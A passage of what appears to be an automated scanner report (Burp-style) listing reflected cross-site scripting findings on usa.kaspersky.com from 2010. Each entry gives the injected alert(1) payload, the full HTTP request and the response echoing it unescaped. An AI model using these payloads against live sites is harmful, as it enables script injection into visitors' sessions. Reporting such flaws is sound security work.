Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/5756f8bcc"-alert(1)-"eb8c35454a HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:11:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685082"
Content-Type: text/html; charset=utf-8
Content-Length: 30000
Date: Sat, 18 Dec 2010 15:11:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/5756f8bcc"-alert(1)-"eb8c35454a";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.168. http://usa.kaspersky.com/node/5756 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5756

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb5d3"><script>alert(1)</script>de98f4cd6e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5756cb5d3"><script>alert(1)</script>de98f4cd6e1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:11:04 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685064"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:11:11 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5756cb5d3"><script>alert(1)</script>de98f4cd6e1" />
...[SNIP]...

1.169. http://usa.kaspersky.com/node/5768/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5768/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 161d4"-alert(1)-"28d8ee9873a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node161d4"-alert(1)-"28d8ee9873a/5768/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; gpv_pageName=Downloads%20%7C%20Free%20Anti-Virus%20Scan; s_nr=1292684745070-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%252520%25257C%252520Free%252520Anti-Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttps%25253A//store.digitalriver.com/store/kasperus/en_US/buy/productID.202172800/offerID.6083370709/offer%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:17:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685435"
Content-Type: text/html; charset=utf-8
Content-Length: 30066
Date: Sat, 18 Dec 2010 15:17:21 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node161d4"-alert(1)-"28d8ee9873a/5768/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.170. http://usa.kaspersky.com/node/5768/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5768/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff1e2"><script>alert(1)</script>f03ebded000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodeff1e2"><script>alert(1)</script>f03ebded000/5768/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; gpv_pageName=Downloads%20%7C%20Free%20Anti-Virus%20Scan; s_nr=1292684745070-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%252520%25257C%252520Free%252520Anti-Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttps%25253A//store.digitalriver.com/store/kasperus/en_US/buy/productID.202172800/offerID.6083370709/offer%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:16:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685416"
Content-Type: text/html; charset=utf-8
Content-Length: 30162
Date: Sat, 18 Dec 2010 15:17:03 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodeff1e2"><script>alert(1)</script>f03ebded000/5768/lightbox2" />
...[SNIP]...

1.171. http://usa.kaspersky.com/node/5768/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5768/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b12cd"><script>alert(1)</script>5cdcc55f73f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5768b12cd"><script>alert(1)</script>5cdcc55f73f/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; gpv_pageName=Downloads%20%7C%20Free%20Anti-Virus%20Scan; s_nr=1292684745070-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%252520%25257C%252520Free%252520Anti-Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttps%25253A//store.digitalriver.com/store/kasperus/en_US/buy/productID.202172800/offerID.6083370709/offer%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:18:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685519"
Content-Type: text/html; charset=utf-8
Content-Length: 29398
Date: Sat, 18 Dec 2010 15:18:42 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5768b12cd"><script>alert(1)</script>5cdcc55f73f/lightbox2" />
...[SNIP]...

1.172. http://usa.kaspersky.com/node/5768/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5768/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97f63"-alert(1)-"11e659ce77d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/576897f63"-alert(1)-"11e659ce77d/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; gpv_pageName=Downloads%20%7C%20Free%20Anti-Virus%20Scan; s_nr=1292684745070-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%252520%25257C%252520Free%252520Anti-Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttps%25253A//store.digitalriver.com/store/kasperus/en_US/buy/productID.202172800/offerID.6083370709/offer%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:18:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685532"
Content-Type: text/html; charset=utf-8
Content-Length: 29301
Date: Sat, 18 Dec 2010 15:18:57 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/576897f63"-alert(1)-"11e659ce77d/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.173. http://usa.kaspersky.com/node/5768/lightbox2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5768/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c8be"><script>alert(1)</script>f510b626256 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5768/lightbox28c8be"><script>alert(1)</script>f510b626256 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; gpv_pageName=Downloads%20%7C%20Free%20Anti-Virus%20Scan; s_nr=1292684745070-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%252520%25257C%252520Free%252520Anti-Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttps%25253A//store.digitalriver.com/store/kasperus/en_US/buy/productID.202172800/offerID.6083370709/offer%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:21:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685685"
Content-Type: text/html; charset=utf-8
Content-Length: 29408
Date: Sat, 18 Dec 2010 15:21:38 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5768/lightbox28c8be"><script>alert(1)</script>f510b626256" />
...[SNIP]...

1.174. http://usa.kaspersky.com/node/5768/lightbox2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5768/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81910"><script>alert(1)</script>79f6440ee1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5768/lightbox2?81910"><script>alert(1)</script>79f6440ee1e=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; gpv_pageName=Downloads%20%7C%20Free%20Anti-Virus%20Scan; s_nr=1292684745070-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%252520%25257C%252520Free%252520Anti-Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttps%25253A//store.digitalriver.com/store/kasperus/en_US/buy/productID.202172800/offerID.6083370709/offer%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:14:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685291"
Content-Type: text/html; charset=utf-8
Content-Length: 13973
Date: Sat, 18 Dec 2010 15:14:57 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5768/lightbox2?81910"><script>alert(1)</script>79f6440ee1e=1" />
...[SNIP]...

1.175. http://usa.kaspersky.com/node/5769/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5769/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffd5c"-alert(1)-"ff32c0aca43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nodeffd5c"-alert(1)-"ff32c0aca43/5769/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:43:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687039"
Content-Type: text/html; charset=utf-8
Content-Length: 30066
Date: Sat, 18 Dec 2010 15:44:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodeffd5c"-alert(1)-"ff32c0aca43/5769/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.176. http://usa.kaspersky.com/node/5769/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5769/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7722"><script>alert(1)</script>eb7c6e87780 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodeb7722"><script>alert(1)</script>eb7c6e87780/5769/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:43:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687020"
Content-Type: text/html; charset=utf-8
Content-Length: 30163
Date: Sat, 18 Dec 2010 15:43:46 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodeb7722"><script>alert(1)</script>eb7c6e87780/5769/lightbox2" />
...[SNIP]...

1.177. http://usa.kaspersky.com/node/5769/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5769/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1050f"><script>alert(1)</script>4f7e3f414d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/57691050f"><script>alert(1)</script>4f7e3f414d2/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:21 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687121"
Content-Type: text/html; charset=utf-8
Content-Length: 29398
Date: Sat, 18 Dec 2010 15:45:28 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/57691050f"><script>alert(1)</script>4f7e3f414d2/lightbox2" />
...[SNIP]...

1.178. http://usa.kaspersky.com/node/5769/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5769/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ded9"-alert(1)-"ef0721c49bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/57696ded9"-alert(1)-"ef0721c49bd/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:41 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687141"
Content-Type: text/html; charset=utf-8
Content-Length: 29301
Date: Sat, 18 Dec 2010 15:45:49 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/57696ded9"-alert(1)-"ef0721c49bd/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.179. http://usa.kaspersky.com/node/5769/lightbox2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5769/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d93a4"><script>alert(1)</script>1c7077008e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

